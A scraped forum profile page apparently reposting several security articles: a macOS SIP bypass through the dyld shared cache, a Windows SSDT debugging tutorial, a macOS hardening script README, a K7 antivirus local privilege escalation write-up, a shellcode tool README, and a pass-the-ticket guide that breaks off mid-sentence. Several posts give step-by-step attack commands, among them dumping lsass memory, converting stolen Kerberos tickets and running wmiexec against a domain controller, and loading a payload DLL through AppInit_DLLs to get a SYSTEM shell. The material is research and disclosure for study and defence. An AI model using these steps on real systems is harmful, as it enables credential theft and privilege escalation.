-
Posts
18794 -
Joined
-
Last visited
-
Days Won
742
Everything posted by Nytro
-
Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g). On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally on the system and therefore doesn't have a real code signature; instead, SIP seems to be the only mechanism that prevents modifications of the dyld shared cache. update_dyld_shared_cache, the tool responsible for generating the shared cache, is able to write to /private/var/db/dyld/ because it has the com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache is responsible for ensuring that it only writes data from trustworthy libraries when updating the shared cache. update_dyld_shared_cache accepts two interesting command-line arguments that make it difficult to enforce these security properties: - "-root": Causes libraries to be read from, and the cache to be written to, a caller-specified filesystem location. - "-overlay": Causes libraries to be read from a caller-specified filesystem location before falling back to normal system directories. There are some checks related to this, but they don't look very effective. main() tries to see whether the target directory is protected by SIP: bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir); If that variable is true, update_dyld_shared_cache attempts to ensure that all source libraries are also protected by SIP. isProtectedBySIP() is implemented as follows: bool isProtectedBySIP(const std::string& path) { if ( !sipIsEnabled() ) return false; return (rootless_check_trusted(path.c_str()) == 0); } Ignoring that this looks like a typical symlink race issue, there's another problem: Looking in a debugger (with SIP configured so that only debugging restrictions and dtrace restrictions are disabled), it seems like rootless_check_trusted() doesn't work as expected: bash-3.2# lldb /usr/bin/update_dyld_shared_cache [...] (lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&) Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4 [...] (lldb) run -force Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64) Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) update_dyld_shared_cache`isProtectedBySIP: -> 0x1000433a4 <+0>: pushq %rbp 0x1000433a5 <+1>: movq %rsp, %rbp 0x1000433a8 <+4>: pushq %rbx 0x1000433a9 <+5>: pushq %rax Target 0: (update_dyld_shared_cache) stopped. (lldb) breakpoint set --name rootless_check_trusted Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea (lldb) continue Process 457 resuming Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1 frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted libsystem_sandbox.dylib`rootless_check_trusted: -> 0x7fff5f32b8ea <+0>: pushq %rbp 0x7fff5f32b8eb <+1>: movq %rsp, %rbp 0x7fff5f32b8ee <+4>: movl $0xffffffff, %esi ; imm = 0xFFFFFFFF 0x7fff5f32b8f3 <+9>: xorl %edx, %edx Target 0: (update_dyld_shared_cache) stopped. (lldb) print (char*)$rdi (char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/" (lldb) finish Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = step out frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54 update_dyld_shared_cache`isProtectedBySIP: -> 0x1000433da <+54>: testl %eax, %eax 0x1000433dc <+56>: sete %al 0x1000433df <+59>: addq $0x8, %rsp 0x1000433e3 <+63>: popq %rbx Target 0: (update_dyld_shared_cache) stopped. (lldb) print $rax (unsigned long) $1 = 1 Looking around with a little helper (under the assumption that it doesn't behave differently because it doesn't have the entitlement), it looks like only a small part of the SIP-protected directories show up as protected when you check with rootless_check_trusted(): bash-3.2# cat rootless_test.c #include <stdio.h> int rootless_check_trusted(char *); int main(int argc, char **argv) { int res = rootless_check_trusted(argv[1]); printf("rootless status for '%s': %d (%s)\n", argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE"); } bash-3.2# ./rootless_test / rootless status for '/': 1 (MALLEABLE) bash-3.2# ./rootless_test /System rootless status for '/System': 0 (PROTECTED) bash-3.2# ./rootless_test /System/ rootless status for '/System/': 0 (PROTECTED) bash-3.2# ./rootless_test /System/Library rootless status for '/System/Library': 0 (PROTECTED) bash-3.2# ./rootless_test /System/Library/Assets rootless status for '/System/Library/Assets': 1 (MALLEABLE) bash-3.2# ./rootless_test /System/Library/Caches rootless status for '/System/Library/Caches': 1 (MALLEABLE) bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE) bash-3.2# ./rootless_test /usr rootless status for '/usr': 0 (PROTECTED) bash-3.2# ./rootless_test /usr/local rootless status for '/usr/local': 1 (MALLEABLE) bash-3.2# ./rootless_test /private rootless status for '/private': 1 (MALLEABLE) bash-3.2# ./rootless_test /private/var/db rootless status for '/private/var/db': 1 (MALLEABLE) bash-3.2# ./rootless_test /private/var/db/dyld/ rootless status for '/private/var/db/dyld/': 1 (MALLEABLE) bash-3.2# ./rootless_test /sbin rootless status for '/sbin': 0 (PROTECTED) bash-3.2# ./rootless_test /Applications/Mail.app/ rootless status for '/Applications/Mail.app/': 0 (PROTECTED) bash-3.2# Perhaps rootless_check_trusted() limits its trust to paths that are writable exclusively using installer entitlements like com.apple.rootless.install, or something like that? That's the impression I get when testing different entries from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted specific entitlement show up as protected, the ones with a whitelisted specific entitlement show up as malleable. rootless_check_trusted() checks for the "file-write-data" permission through the MAC syscall, but I haven't looked in detail at how the policy actually looks. (By the way, looking at update_dyld_shared_cache, I'm not sure whether it would actually work if the requireDylibsBeRootlessProtected flag is true - it looks like addIfMachO() would never add any libraries to dylibsForCache because `sipProtected` is fixed to `false` and the call to isProtectedBySIP() is commented out?) In theory, this means it's possible to inject a modified version of a library into the dyld cache using either the -root or the -overlay flag of update_dyld_shared_cache, reboot, and then run an entitled binary that will use the modified library. However, there are (non-security) checks that make this annoying: - When loading libraries, loadPhase5load() checks whether the st_ino and st_mtime of the on-disk library match the ones embedded in the dyld cache at build time. - Recently, dyld started ensuring that the libraries are all on the "boot volume" (the path specified with "-root", or "/" if no root was specified). The inode number check means that it isn't possible to just create a malicious copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to use the malicious copy; the modified library will have a different inode number. I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even that is possible; inode numbers are monotonically incrementing 64-bit integers. Since root (and even normal users) can mount filesystem images, I decided to create a new filesystem with appropriate inode numbers. I think HFS probably can't represent the full range of inode numbers that APFS can have (and that seem to show up on volumes that have been converted from HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I decided to go with an APFS image. Writing code to craft an entire APFS filesystem would probably take quite some time, and the public open-source APFS implementations seem to be read-only, so I'm first assembling a filesystem image normally (create filesystem with newfs_apfs, mount it, copy files in, unmount), then renumbering the inodes. By storing files in the right order, I don't even need to worry about allocating and deallocating space in tree nodes and such - all replacements can be performed in-place. My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so that it always returns zero, which causes the userspace kext loading code to ignore code signing errors. To reproduce: - Ensure that SIP is on. - Ensure that you have at least something like 8GiB of free disk space. - Unpack the attached dyld_sip.tar (as normal user). - Run ./collect.sh (as normal user). This should take a couple minutes, with more or less continuous status updates. At the end, it should say "READY" after mounting an image to /private/tmp/L. (If something goes wrong here and you want to re-run the script, make sure to detach the volume if the script left it attached - check "hdiutil info".) - As root, run "update_dyld_shared_cache -force -root /tmp/L". - Reboot the machine. - Build an (unsigned) kext from source. I have attached source code for a sample kext as testkext.tar - you can unpack it and use xcodebuild -, but that's just a simple "hello world" kext, you could also use anything else. - As root, copy the kext to /tmp/. - As root, run "kextutil /tmp/[...].kext". You should see something like this: bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" } Code Signing Failure: code signature is invalid Disabling KextAudit: SIP is off Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" } bash-3.2# dmesg|tail -n1 test kext loaded bash-3.2# kextstat | grep test 120 0 0xffffff7f82a50000 0x2000 0x2000 net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5> bash-3.2# Miscellaneous notes: - It looks like there's an OOB kernel write in the dyld shared cache pager; but AFAICS that isn't reachable unless you've already defeated SIP, so I don't think it's a vulnerability: vm_shared_region_slide_page_v3() is used when a page from the dyld cache is being paged in. It essentially traverses a singly-linked list of relocations inside the page; the offset of the first relocation (iow the offset of the list head) is stored permanently in kernel memory when the shared cache is initialized. As far as I can tell, this function is missing bounds checks; if either the starting offset or the offset stored in the page being paged in points outside the page, a relocation entry will be read from OOB memory, and a relocated address will conditionally be written back to the same address. - There is a check `rootPath != "/"` in update_dyld_shared_cache; but further up is this: // canonicalize rootPath if ( !rootPath.empty() ) { char resolvedPath[PATH_MAX]; if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) { rootPath = resolvedPath; } // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty if ( rootPath == "/" ) { rootPath = ""; } } So as far as I can tell, that condition is always true, which means that when an overlay path is specified with `-overlay`, the cache is written to the root even though the code looks as if the cache is intended to be written to the overlay. - Some small notes regarding the APFS documentation at <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>: - The typedef for apfs_superblock_t is missing. - The documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but actually they can be j_drec_hashed_key_t. - The documentation claims that o_cksum is "The Fletcher 64 checksum of the object", but actually APFS requires that the fletcher64 checksum of all data behind the checksum concatenated with the checksum is zero. (In other words, you cut out the checksum field at the start, append it at the end, then run fletcher64 over the buffer, and then you have to get an all-zeroes checksum.) Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip Sursa: https://www.exploit-db.com/exploits/47708
-
A Glimpse into SSDT inside Windows x64 Kernel What is SSDT System Service Dispatch Table or SSDT, simply is an array of addresses to kernel routines for 32 bit operating systems or an array of relative offsets to the same routines for 64 bit operating systems. SSDT is the first member of the Service Descriptor Table kernel memory structure as shown below: typedef struct tagSERVICE_DESCRIPTOR_TABLE { SYSTEM_SERVICE_TABLE nt; //effectively a pointer to Service Dispatch Table (SSDT) itself SYSTEM_SERVICE_TABLE win32k; SYSTEM_SERVICE_TABLE sst3; //pointer to a memory address that contains how many routines are defined in the table SYSTEM_SERVICE_TABLE sst4; } SERVICE_DESCRIPTOR_TABLE; SSDTs used to be hooked by AVs as well as rootkits that wanted to hide files, registry keys, network connections, etc. Microsoft introduced PatchGuard for x64 systems to fight SSDT modifications by BSOD'ing the system. In Human Terms When a program in user space calls a function, say CreateFile, eventually code execution is transfered to ntdll!NtCreateFile and via a syscall to the kernel routine nt!NtCreateFile. Syscall is merely an index in the System Service Dispatch Table (SSDT) which contains an array of pointers for 32 bit OS'es (or relative offsets to the Service Dispatch Table for 64 bit OSes) to all critical system APIs like ZwCreateFile, ZwOpenFile and so on.. Below is a simplified diagram that shows how offsets in SSDT KiServiceTable are converted to absolute addresses of corresponding kernel routines: Effectively, syscalls and SSDT (KiServiceTable) work togeher as a bridge between userland API calls and their corresponding kernel routines, allowing the kernel to know which routine should be executed for a given syscall that originated in the user space. Service Descriptor Table In WinDBG, we can check the Service Descriptor Table structure KeServiceDescriptorTable as shown below. Note that the first member is recognized as KiServiceTable - this is a pointer to the SSDT itself - the dispatch table (or simply an array) containing all those pointers/offsets: 0: kd> dps nt!keservicedescriptortable L4 fffff801`9210b880 fffff801`9203b470 nt!KiServiceTable fffff801`9210b888 00000000`00000000 fffff801`9210b890 00000000`000001ce fffff801`9210b898 fffff801`9203bbac nt!KiArgumentTable Let's try and print out a couple of values from the SSDT: 0: kd> dd /c1 KiServiceTable L2 fffff801`9203b470 fd9007c4 fffff801`9203b474 fcb485c0 As mentioned earlier, on x64 which is what I'm running in my lab, SSDT contains relative offsets to kernel routines. In order to get the absolute address for a given offset, the following formula needs to be applied: RoutineAbsoluteAddress = KiServiceTableAddress + (routineOffset >>> 4)RoutineAbsoluteAddress=KiServiceTableAddress+(routineOffset>>>4) Using the above formula and the first offset fd9007c4 we got from the KiServiceTable, we can work out that this offset is pointing to nt!NtAccessCheck: 0: kd> u KiServiceTable + (0xfd9007c4 >>> 4) nt!NtAccessCheck: fffff801`91dcb4ec 4c8bdc mov r11,rsp fffff801`91dcb4ef 4883ec68 sub rsp,68h fffff801`91dcb4f3 488b8424a8000000 mov rax,qword ptr [rsp+0A8h] fffff801`91dcb4fb 4533d2 xor r10d,r10d We can confirm it if we try to disassemble the nt!NtAccessCheck - routine addresses (fffff801`91dcb4ec) and first instructions (mov r11, rsp) of the above and below commands match: 0: kd> u nt!NtAccessCheck L1 nt!NtAccessCheck: fffff801`91dcb4ec 4c8bdc mov r11,rsp If we refer back to the original drawing on how SSDT offsets are converted to absolute addresses, we can redraw it with specific values for syscall 0x1: Finding a Dispatch Routine for a Given Userland Syscall As a simple exercise, given a known syscall number, we can try to work out what kernel routine will be called once that syscall is issued. Let's load the debugging symbols for ntdll module: .reload /f ntdll.dll lm ntdll Let's now find the syscall for ntdll!NtCreateFile: 0: kd> u ntdll!ntcreatefile L2 ...we can see the syscall is 0x55: Offsets in the KiServiceTable are 4 bytes in size, so we can work out the offset for syscall 0x55 by looking into the value the KiServiceTable holds at position 0x55: 0: kd> dd /c1 kiservicetable+4*0x55 L1 fffff801`9203b5c4 01fa3007 We see from the above that the offset for NtCreateFile is 01fa3007. Using the formula discussed previously for working out the absolute routine address, we confirm that we're looking at the nt!tCreateFile kernel routine that will be called once ntdll!NtCreateFile issues the 0x55 syscall: 0: kd> u kiservicetable + (01fa3007>>>4) L1 nt!NtCreateFile: fffff801`92235770 4881ec88000000 sub rsp,88h Let's redraw the earlier diagram once more for the syscall 0x55 for ntdll!NtCreateFile: Finding Address of All SSDT Routines As another exercise, we could loop through all items in the service dispatch table and print absolute addresses for all routines defined in the dispatch table: .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(keservicedescriptortable+0x10) }){ dp kiservicetable + ( offset >>> 4 ) L1 } Nice, but not very human readable. We can update the loop a bit and print out the API names associated with those absolute addresses: 0: kd> .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(nt!KeServiceDescriptorTable+10)}){ r $t0 = ( offset >>> 4) + nt!KiServiceTable; .printf "%p - %y\n", $t0, $t0 } fffff80191dcb4ec - nt!NtAccessCheck (fffff801`91dcb4ec) fffff80191cefccc - nt!NtWorkerFactoryWorkerReady (fffff801`91cefccc) fffff8019218df1c - nt!NtAcceptConnectPort (fffff801`9218df1c) fffff801923f8848 - nt!NtMapUserPhysicalPagesScatter (fffff801`923f8848) fffff801921afc10 - nt!NtWaitForSingleObject (fffff801`921afc10) fffff80191e54010 - nt!NtCallbackReturn (fffff801`91e54010) fffff8019213cf60 - nt!NtReadFile (fffff801`9213cf60) fffff801921b2e80 - nt!NtDeviceIoControlFile (fffff801`921b2e80) fffff80192212dc0 - nt!NtWriteFile (fffff801`92212dc0) .....cut for brewity..... References The Quest for the SSDTs The much talked about Kernel data structures www.codeproject.com .printf - Windows drivers The .printf token behaves like the printf statement in C. docs.microsoft.com .foreach - Windows drivers The .foreach token parses the output of one or more debugger commands and uses each value in this output as the input to one or more additional commands. docs.microsoft.com Sursa: https://ired.team/miscellaneous-reversing-forensics/windows-kernel/glimpse-into-ssdt-in-windows-x64-kernel
-
macOS Lockdown (mOSL) Bash script to audit and fix macOS Catalina (10.15.x) security settings Inspired by and based on Lockdown by Patrick Wardle and osxlockdown by Scott Piper. Warnings mOSL is being rewritten in Swift and the Bash version will be deprecated.. See: "The Future of mOSL". Always run the latest release not the code in master! This script will only ever support the latest macOS release This script requires your password to invoke some commands with sudo brew tap: 0xmachos/homebrew-mosl To install mOSL via brew execute: brew tap 0xmachos/homebrew-mosl brew install mosl mOSL will then be available as: Lockdown Threat Model(ish) The main goal is to enforce already secure defaults and apply more strict non-default options. It aims to reduce attack surface but it is pragmatic in this pursuit. The author utilises Bluetooth for services such as Handoff so it is left enabled. There is no specific focus on enhancing privacy. Finally, mOSL will not protect you from the FSB, MSS, DGSE, or FSM. Full Disk Access Permission In macOS Mojave and later certain application data is protected by the OS. For example, if Example.app wishes to access Contacts.app data Example.app must be given explicit permission via System Preferences > Security & Privacy > Privacy. However some application data cannot be accessed via a specific permission. Access to this data requires the Full Disk Access permission. mOSL requires that Terminal.app be given the Full Disk Access permission. It needs this permission to audit/fix the following settings: disable mail remote content disable_auto_open_safe_downloads These are currently the only settings which require Full Disk Access. It is not possible to programatically get or prompt for this permission, it must be manually given by the user. To give Terminal.app Full Disk Access: System Preferences > Security & Privacy > Privacy > Full Disk Access > Add Terminal.app Once you are done with mOSL you can revoke Full Disk Access for Terminal.app. There's a small checkbox next to Terminal which you can uncheck to revoke the premssion without entirely removing Terminal.app from the list. More info on macOS's new permission model: Working with Mojave’s Privacy Protection by Howard Oakley TCC Round Up by Carl Ashley WWDC 2018 Session 702 Your Apps and the Future of macOS Security Verification The executable Lockdown file can be verified with Minisign: minisign -Vm Lockdown -P RWTiYbJbLl7q6uQ70l1XCvGExizUgEBNDPH0m/1yMimcsfgh542+RDPU Install via brew: brew install minisign Usage $ ./Lockdown Audit or Fix macOS security settings?? Usage: ./Lockdown [list | audit {setting_index} | fix {setting_index} | debug] list - List settings that can be audited/ fixed audit - Audit the status of all or chosen setting(s) (Does NOT change settings) fix - Attempt to fix all or chosen setting(s) (Does change settings) fix-force - Same as 'fix' however bypasses user confirmation prompt (Can be used to invoke Lockdown from other scripts) debug - Print debug info for troubleshooting Settings See Commands.md for a easy to read list of commands used to audit/ fix the below settings. Settings that can be audited/ fixed: [0] enable automatic system updates [1] enable automatic app store updates [2] enable gatekeeper [3] enable firewall [4] enable admin password preferences [5] enable terminal secure entry [6] enable sip [7] enable filevault [8] disable firewall builin software [9] disable firewall downloaded signed [10] disable ipv6 [11] disable mail remote content [12] disable remote apple events [13] disable remote login [14] disable auto open safe downloads [15] set airdrop contacts only [16] set appstore update check daily [17] set firmware password [18] check kext loading consent [19] check efi integrity [20] check if standard user Sursa: https://github.com/0xmachos/mOSL
-
Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897) Exploit Development antivirus windows reverseengineering Nov 24 1 / 1 Nov 25 21h ago dtmwaifu pillow collector 21h Anti-virus Exploitation Hey guys, long time no article! Over the past few months, I have been looking into exploitation of anti-viruses via logic bugs. I will briefly discuss the approach towards performing vulnerability research of these security products using the vulnerability I discovered in K7 Security as an example. Disclaimer: I do not claim to know everything about vulnerability research nor exploitation so if there are errors in this article, please let me know. Target Selection Security products such as anti-viruses are an attractive target (at least for me) because they operate in a trusted and privileged context in both the kernel, as a driver, and userland, as a privileged service. This means that they have the ability to facilitate potential escalation of privilege or otherwise access privileged functionality. They have a presence in the low-privileged space of the operating system. For example, there may exist a UI component with which the user can interact, sometimes allowing options to be changed such as enabling/disabling anti-virus, adding directory or file exclusions, and scanning files for malware. Anti-viruses must also access and perform operations on operating system objects to detect malware, such as reading files, registry keys, memory, etc. as well as being able to do privileged actions to keep the system in a protected state no matter the situation. It is between this trusted, high privilege space and the untrusted, low privileged space where interesting things occur. Attack Surface As aforementioned, anti-viruses live in both sides of the privilege boundary as shown in the following diagram: Untitled Diagram(1).jpg762×401 51.7 KB Whatever crosses the line between high and low privilege represents the attack surface. Let’s look at how this diagram can be interpreted. The user interface shares common operations with the service process which is expected. If the user wants to carry out a privileged action, the service will do it on its behalf, assuming that security checks are passed. If the user wishes to change a setting, they open the user interface and click a button. This is communicated to the service process via some form of inter-process communication (IPC) which will perform the necessary actions, e.g. the anti-virus stores its configuration in the registry and therefore, the service will open the relevant registry key and modify some data. Keep in mind that the registry key is stored in the HKEY_LOCAL_MACHINE hive which is in high privilege space, thus requiring a high privilege process to modify its data. So the user, from low privilege, is able to indirectly modify a high privilege object. One more example. A user can scan for malware through the user interface (of course, what good is an anti-virus if they disallow the user from scanning for malware?). A simple, benign operation, what could go wrong? Since it is the responsibility of the service process to perform the malware scan, the interface communicates the information to the service process to target a file. It must interact with the file in order to perform the scan, i.e. it must locate the file on disk and read its content. If, while the file data has been read and is being scanned for malware, and the anti-virus does not lock the file on disk, it is possible for the malware to be replaced with a symbolic link pointing to a file in a high privileged directory (yes, it is possible), let’s use notepad.exe. When the scan is completed and has been determined to be malware, the service process can delete the file. However, the malware has been replaced with a link to notepad.exe! If the anti-virus does not detect and reject the symbolic link, it will delete notepad.exe without question. This is an example of a Time of Check to Time of Use (TOCTOU) 1 race condition bug. Again, the user, from low privilege, is able to indirectly modify a high privilege object because of the service process acting as a broker. Exploitation This vulnerability allows a low privilege user to modify (almost) arbitrary registry data through the anti-virus’s settings. However, a low privileged user (non administrator) cannot should not be able to change the anti-virus’s settings. Bypassing Administrative Checks To narrow down how this administration check is performed, procmon can be used to identify operating system activity as the settings page is accessed again. This will trigger the anti-virus to recheck the administrative status of the current user while it interacts with the operating system as it is being logged. Of course, since we are low privilege and procmon requires high privilege, it is not practical in a real environment. However, because we control the testing environment, we can allow procmon to run as we have access to an administrator account. Setting promon to filter by K7TSMain as the process name will capture activity performed by the user interface process. When procmon starts to log, attempting to access the settings page again in the UI will trigger procmon to instantly show results: procmon admin check.png1162×491 105 KB It can be seen that the anti-virus stores the administrative check in the registry in AdminNonAdminIsValid. Looking at the value in the Event Properties window shows that it returned 0, meaning that non administrator users are not allowed. But there is a slight problem here. Bonus points if you can spot it. Now that we know where the check is being performed, the next step is bypassing it. procmon shows that the process is running in low privilege space as indicated by the user and the medium integrity meaning that we own the process. If it is not protected, we can simply hook the RegQueryValue function and modify the return value. Attaching to K7TSMain.png815×362 96.9 KB Attempting to attach to the K7TSMain.exe process using x32dbg is allowed! The breakpoint on RegQueryValueExA has been set for when we try to access the settings page again. Triggering RegQueryValueExA breakpoint.png1064×577 101 KB x32dbg catches the breakpoint when the settings page is clicked. The value name being queried is ProductType but we want AdminNonAdminIsValid, so continuing on will trigger the next breakpoint: Breakpoint on AdminNonAdminIsValid.png761×506 41.6 KB Now we can see AdminNonAdminIsValid. To modify the return value, we can allow the function to run until return. However, the calling function looks like a wrapper for RegQueryValueExA: So continuing again until return reveals the culprit function that performs the check: Admin check function.png754×157 11.2 KB There is an obvious check there for the value 1 however, the current returned value for the registry data is 0. This decides the return value of this function so we can either change [esp+4] or change the return value to bypass the check: Bypass admin check.png847×518 23.4 KB Intercepting Inter-process Communication Multiple inter-process communication methods are available on Windows such as mailslots, file mapping, COM, and named pipes. We must figure out which is implemented in the product to be able to analyse the protocol. An easy way to do this is by using API Monitor to log select function calls made by the process. When we do this and then apply a changed setting, we can see references to named pipe functions: image.png1081×513 62.5 KB Note that the calling module is K7AVOptn.dll instead of K7TSMain.exe. If we have a look at the data being communicated through TransactNamedPipe, we can see some interesting information: image.png704×204 13 KB The first thing that pops out is that it looks like a list of extension names (.ocx, .exe, .com) separated with | where some have wildcard matching. This could be a list of extensions to scan for malware. If we have a look at the registry where the anti-virus stores its configuration, we can see something similar under the value ScanExtensions in the RTFileScanner key: image.png820×696 83.5 KB Continuing down the list of calls, one of them contains some very intriguing data: image.png703×415 26.4 KB It looks as though the anti-virus is applying values by specifying (privileged) registry keys and their values by their full key path. The next obvious step is to see if changing one of the keys and their values will work. This can be done by breakpointing on the TransactNamedPipe function in x32dbg: image.png768×551 43.9 KB Once here, locate the input buffer in the second argument and alter the data to add or change a key in the HKEY_LOCAL_MACHINE hive like so: image.png781×172 17.9 KB If it is possible to change this registry key’s values, high privileged processes will be forced to load the DLLs listed in AppInit_DLLs, i.e. one that we control. The LoadAppInit_DLLs value must also be set to 1 (it is 0 by default) to enable this functionality. The result: image.png1008×559 66.7 KB Triggering the Payload You may have noticed that the registry key resides within Wow6432Node which is the 32-bit counterpart of the registry. This is because the product is 32-bit and so Windows will automatically redirect registry changes. In 64-bit Windows, processes are usually 64-bit and so the chances of loading the payload DLL through AppInit_DLLs is unlikely. A reliable way is to make use of the anti-virus because it is 32-bit assuming a privileged component can be launched. The easiest way to do this is to restart the machine because it will reload all of the anti-virus’s processes however, it is not always practical nor is it clean. Clicking around the UI reveals that the update function runs K7TSHlpr.exe under the NT AUTHORITY\SYSTEM user: image.png1427×456 83 KB As it is a 32-bit application, Windows will load our AppInit_DLLs DLL into the process space. image.png856×537 59.5 KB Using system("cmd") as the payload will prompt the user with an interactive session in the context of the NT AUTHORITY\SYSTEM account via the UI0Detect service: Selecting to view the message brings up the following: image.png742×598 13.2 KB We have root! Automated Exploit 9 Link to my GitHub for the advisory and an automated exploit 10. Sursa: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655
-
Sickle Sickle is a payload development tool originally created to aid me in crafting shellcode, however it can be used in crafting payloads for other exploit types as well (non-binary). Although the current modules are mostly aimed towards assembly this tool is not limited to shellcode. Sickle can aid in the following: Identifying instructions resulting in bad characters when crafting shellcode Formatting output in various languages (python, perl, javascript, etc). Accepting bytecode via STDIN and formatting it. Executing shellcode in both Windows and Linux environments. Diffing for two binaries (hexdump, raw, asm, byte) Dissembling shellcode into assembly language (ARM, x86, etc). Shellcode extraction from raw bins (nasm sc.asm -o sc) Quick failure check A task I found myself doing repetitively was compiling assembler source code then extracting the shellcode, placing it into a wrapper, and testing it. If it was a bad run, the process would be repeated until successful. Sickle takes care of placing the shellcode into a wrapper for quick testing. (Works on Windows and Unix systems): Recreating shellcode Sometimes you find a piece of shellcode that's fluent in its execution and you want to recreate it yourself to understand its underlying mechanisms. Sickle can help you compare the original shellcode to your "recreated" version. If you're not crafting shellcode and just need 2 binfiles to be the same this feature can also help verifying files are the same byte by byte (multiple modes). Disassembly Sickle can also take a binary file and convert the extracted opcodes (shellcode) to machine instructions. Keep in mind this works with raw opcodes (-r) and STDIN (-r -) as well. In the following example I am converting a reverse shell designed by Stephen Fewer to assembly. Bad character identification Module Based Design This tool was originally designed as a one big script, however recently when a change needed to be done to the script I had to relearn my own code... In order to avoid this in the future I've decided to keep all modules under the "modules" directory (default module: format). If you prefer the old design, I have kept a copy under the Documentation directory. ~# sickle.py -l Name Description ---- ----------- diff Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes run Execute shellcode on either windows or unix format Format bytecode into desired format / language badchar Generate bad characters in respective format disassemble Disassemble bytecode in respective architecture pinpoint Pinpoint where in shellcode bad characters occur ~# sickle -i -m diff Options for diff Options: Name Required Description ---- -------- ----------- BINFILE yes Additional binary file needed to perform diff MODE yes hexdump, byte, raw, or asm Description: Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes Sursa: https://github.com/wetw0rk/Sickle
-
Practical Guide to Passing Kerberos Tickets From Linux Nov 21, 2019 This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash. This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post. Tools To get started we will first need to setup some tools. All have information on how to setup on their GitHub page. Impacket https://github.com/SecureAuthCorp/impacket pypykatz https://github.com/skelsec/pypykatz Kerberos Client RPM based: yum install krb5-workstation Debian based: apt install krb5-user procdump https://docs.microsoft.com/en-us/sysinternals/downloads/procdump autoProc.py (not required, but useful) wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py Lab Environment This guide will use a simple Windows lab with two hosts: dc01.winlab.com (domain controller) client01.winlab.com (generic server And two domain accounts: Administrator (domain admin) User1 (local admin to client01) Passing the Ticket By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com. A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz. This can be done by uploading procdump64.exe to the target host: And then run: procdump64.exe -accepteula -ma lsass.exe output-file Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107): python3 autoProc.py domain/user@target We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets: pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp And view the available tickets: Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account! The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host: kirbi2ccache input.kirbi output.ccache Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct: export KRB5CCNAME=/path/to/.ccache klist We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller: wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it 